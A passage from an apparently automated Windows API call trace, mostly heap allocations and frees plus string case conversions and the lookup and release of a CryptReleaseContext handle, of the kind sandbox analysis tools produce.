cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.135] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.135] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.138] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.138] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.138] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.138] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.138] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.139] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.139] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.140] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.140] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.140] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.140] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.141] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.141] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.142] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.142] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.142] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.142] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.143] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0258.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.145] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0258.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.145] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0258.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0258.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.147] HeapFree (in: 